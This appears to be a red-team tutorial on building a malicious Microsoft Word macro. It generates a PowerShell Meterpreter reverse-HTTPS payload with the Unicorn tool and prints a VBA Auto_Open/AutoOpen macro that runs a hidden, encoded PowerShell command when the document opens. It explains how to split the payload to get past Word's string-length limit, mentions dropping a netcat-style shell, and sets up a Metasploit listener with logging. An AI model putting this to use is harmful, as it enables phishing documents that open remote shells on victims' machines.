How to generate payload using Unicorn

Clone unicorn and cd to it:

`$ git clone <>
$ cd unicorn`

Generate powershell payload via unicorn:

`$ python windows/meterpreter/reverse_https 443
[*] Generating the payload shellcode. This could take a few seconds/minutes as we create the shellcode...
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create a listener.
Then you can find your payload in powershell_attack.txt file. Copy it and paste to your macros in a doc file.`

When you try to insert payload genetated beunicorn Microsoft Word/Excel might throw an error about string length. You can bypass it. Break the string into multiple substrings and then just concatenate them. Now you macro should look like this:

`Sub Auto_Open()
Dim exec As String
str1 = "powershell -window hidden -e JABCAGMAVQA...ABBAGw"
str32 = "ABXAGkAbgB...ADsAfQA="
exec = str1 + str2 + str3 + str4 + str5 + str6 + str7 + str8 + str9 + str10 + str11 + str12 + str13 + str14 + str15 + str16 + str17 + str18 + str19 + str20 + str21 + str22 + str23 + str24 + str25 + str26 + str27 + str28 + str29 + str30 + str31 + str32
Shell (exec)
End Sub
Sub AutoOpen()
End Sub`

Using both AutoOpen and Auto_Open the payload is able to be executed in different versions of Microsoft Word.

Sometimes it’s a good idea to use staged payload like described above, sometime not. If you have a small one (for example you just want to drop nc like shell) you can use unicorn again. Write a script in powershell save it and the just run:

` <path to your script>`

This will generate your payload to paste into your doc file.

Configuring metasploit the right way

It’s always better to start msfconsole in screen. So run:

`screen msfconsole`

It’s a clever idea to enable logging in metasploit because you don’t want to miss something later:

`msf> spool mylog.log`

Now let’s can make metasploit a bit more talkative, so set:

`msf> set ConsoleLogging true
msf> set LogLevel 5
msf> set SessionLogging true
msf> set TimestampOutput true`

You can change your prompt, for example, to: